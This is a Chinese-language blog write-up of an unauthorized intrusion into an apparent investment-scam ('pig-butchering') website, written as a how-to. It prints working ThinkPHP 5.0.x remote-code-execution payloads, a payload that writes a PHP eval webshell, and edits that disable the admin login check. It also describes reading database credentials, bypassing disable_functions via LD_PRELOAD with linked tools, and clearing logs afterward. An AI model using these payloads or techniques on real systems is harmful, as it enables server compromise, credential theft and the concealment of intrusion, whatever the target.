记一次理财杀猪盘渗透测试案例

gclome

原文链接：记一次理财杀猪盘渗透测试案例

涉及知识点实操-ThinkPHP5远程命令执行漏洞

https://www.hetianlab.com/expc.d ... aign=weixin-wemedia               
通过该实验了解ThinkPHP5远程命令执行漏洞的原因和利用方法，以及如何修复该漏洞。看完文章复制链接学习吧

0X01 前言

今天微信群里一女装大佬给我私发了一个杀猪盘，说她朋友在这个平台上被骗了4W+，现在还有这么好骗的人吗？能不能先给我来一打！！！
因为当时不确定能不能搞下来就没回她信息（其实已经在看了），不确定的事情不敢轻易去答应别人，万一搞不下来就“尴尬”了！
​

年关将至，各类“杀猪盘”又开始冒出来了，谨防网络诈骗、谨防网络诈骗、谨防网络诈骗！！！

随便注册了个用户进去看了下，界面大致如下，应该属于投资理财类杀猪盘，就是通过各种诱导方式让受害者去他们的平台理财。
比如说什么稳赚不赔，赔了自掏腰包赔偿等等，有的受害者就会先小额充值试试，前期肯定会让你赚（后台控制），也能提现，等你大额充值时他们就开始“杀猪”了。
​
0X02 ThinkPHP Getshell

她发过来的是个二维码，通过识别这个二维码得到要测试的目标网址，原打算通过大小写来简单判断目标系统的，结果发现输入一个不存在的路径则报错了，通过报错信息得知这套程序为ThinkPHP V5.0.10框架，这个版本存在有RCE漏洞。
​

通过@Y4er老哥博客中找到ThinkPHP V5.0.10这个版本的可用Payload如下，Thinkphp5 RCE总结：https://y4er.com/post/thinkphp5-rce/。

1. http://php.local/thinkphp5.0.5/public/index.php?s=index
   
2. post
   
3. _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
   
4. _method=__construct&filter[]=system&method=GET&get[]=whoami
   
5. 
   
6. # ThinkPHP <= 5.0.13
   
7. POST /?s=index/index
   
8. s=phpinfo()&_method=__construct&method=&filter[]=assert

复制代码

​


不过在测试中发现exec()、passthru()、system()、shell_exec()等命令执行函数被限制了，猜测应该是用宝塔搭建的，默认就禁止了这些常见危险函数，所以暂时没办法直接反弹shell。
​

既然这样，那么我们就先进行Getshell，通过执行以下Payload写入PHP一句话木马，提示：Use of undefined constant __construct - assumed '__construct'，但其实文件已经写进去了。

1. s=file_put_contents('1.php','<?php @eval($_POST[cmd]);')&_method=__construct&method=&filter[]=assert

复制代码

​


如果在使用中国菜刀连接时出现“链接被重置”或“超时”等情况，这时我们可以先在POST下验证这个一句话木马是否正常，只要能够获取phpinfo基本就没问题了，或者换几个代理节点试试。
​

0X03后台白名单IP限制

访问后台地址时出现：非法IP访问：58.**.***.122，原以为管理员是通过X-Forwarded-For或User-Agent来限制访问后台的，但在经过测试后发现都不是的，后台这里卡了我好一阵！
​

最终我们在config.php文件中发现是以白名单的方式来限制我们访问后台的，大致看了下管理员设置的白名单IP地址（越南、菲律宾、法国），基本可以确定为代理，通过Web日志文件确定确实如此，所以这里我们只需要将我们本地/代理IP地址添加进去后即可访问后台。

1. // 默认模块名
   
2. 'default_module'         => 'home',
   
3. // 禁止访问模块
   
4. 'deny_module_list'       => ['common'],
   
5. //设置某些IP可以访问模块
   
6. 'allow_module_ip'        =>['admin' => ['103.209.102.145','130.105.248.4','43.243.95.241','175.176.8.174','118.143.235.124','43.243.95.249','130.105.179.66','108.162.229.68','43.243.95.204','103.19.165.6','175.158.200.177','175.176.15.145','210.4.101.2','203.177.230.194','45.119.203.90']],
   
7. // 默认控制器名
   
8. 'default_controller'     => 'Index',
   
9. // 默认操作名
   
10. 'default_action'         => 'index',
    
11. // 默认验证器
    
12. 'default_validate'       => '',
    
13. // 默认的空控制器名
    
14. 'empty_controller'       => 'Error',
    
15. // 操作方法后缀
    
16. 'action_suffix'          => '',
    
17. // 自动搜索控制器
    
18. 'controller_auto_search' => false,

复制代码

​

​

接着我们在/www/wwwroot/aljex/config/database.php文件中找到当前数据库用户密码，因为这个网站是由宝塔搭建的，所以密码都是随机生成的。

1. // 数据库类型
   
2. 'type'            => 'mysql',
   
3. // 服务器地址
   
4. 'hostname'        => "127.0.0.1",
   
5. // 数据库名
   
6. 'database'        => "alj",
   
7. // 用户名
   
8. 'username'        => "alj",
   
9. // 密码
   
10. 'password'        =>"wM5t4T***iTX32Mi",
    
11. // 端口
    
12. 'hostport'        => "3306",

复制代码

​


使用刚找到的数据库用户密码在中国菜刀或phpmyadmin连接到alj数据库，然后在dl_user表中找到网站后台管理员的用户密码，加密方式为MD5，但是都解密不了。
​

注：前边我在database.php文件中没有注意看数据库表前缀，一眼看去以为txzh_admin是管理员表，还一直在找它的解密方式，经朋友@久久久提醒才发现找错管理员表了，在这个表中可以看到admin是被“别人”改过的。

1. agent  |  $2y$10$b5bRaCojDtS4j6moFTSUv.t/bESHmsreyK7IDEBud.q9k1XvbfMQm
   
2. user   |  $2y$10$eA5sl1MzHc5H3aZHkEWur.DDiKDKJw6YAC/C8SyXmh4868rzZketu
   
3. admin  |  e10adc3949ba59abbe56e057f20f883e

复制代码

​


目前管理员密文无法解密，那么又该如何进入后台呢？这里有两个思路，1、直接替换管理员的MD5密文，2、修改User.php文件中的检验登入代码，将判断密码中!删掉即可，输入用户admin，密码随意就可以直接登录后台了。

/www/wwwroot/aljex/app/admin/model/User.php：

1. //检验登入
   
2.     public function checkLogin($username,$password){
   
3.         $rs = $this->get(['username' => $username]);
   
4. 
   
5.         session('info',$rs);
   
6.         if(!$rs){
   
7.             $this->error='用户不存在或已被禁用！';
   
8.             return false;
   
9.         }else{
   
10.             if($rs['password']!== md5($password)){
    
11.                 $this->error='用户名或密码错误！';
    
12.                 return true;
    
13.             }
    
14.         }
    
15.         ...SNIP...
    
16.     }

复制代码

/www/wwwroot/aljex/app/admin/controller/Login.php：

1.   public function login(Request $request)
   
2. {
   
3.         $username= $request->post('username');//获取用户名
   
4.         $password= $request->post('password');//获取密码
   
5.         $user = new User();
   
6.         //验证登入
   
7.         if(!$user->checkLogin($username,$password)){
   
8.             $this->error($user->getError());
   
9. 
   
10.         }
    
11.         //记录日志
    
12.         $operation_obj = new \Net\Operation();
    
13.         $operation_obj->writeLog();
    
14. 
    
15.         $this->success('登录成功！', url('Index/index'));
    
16.     }

复制代码

​

​

0X04宝塔disable_functions
宝塔默认限制了以下危险函数，这里我们可以尝试使用以下3个项目来绕过，由于putenv()函数没有被限制，所以最终可以通过LD_PRELOAD & putenv()绕过disable_functions执行系统命令。

• https://github.com/mm0r1/exploits/
  
• https://github.com/l3m0n/Bypass_Disable_functions_Shell
  
• https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
  
  

1. passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_waitpid,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

复制代码

​


能执行系统命令后就可以继续进行后续提权、打包程序和数据了，由于个人技术水平有限，对Linux提权不太熟悉，对这类程序数据也没啥兴趣，简单清理了下日志信息，所以也就到此结束了吧！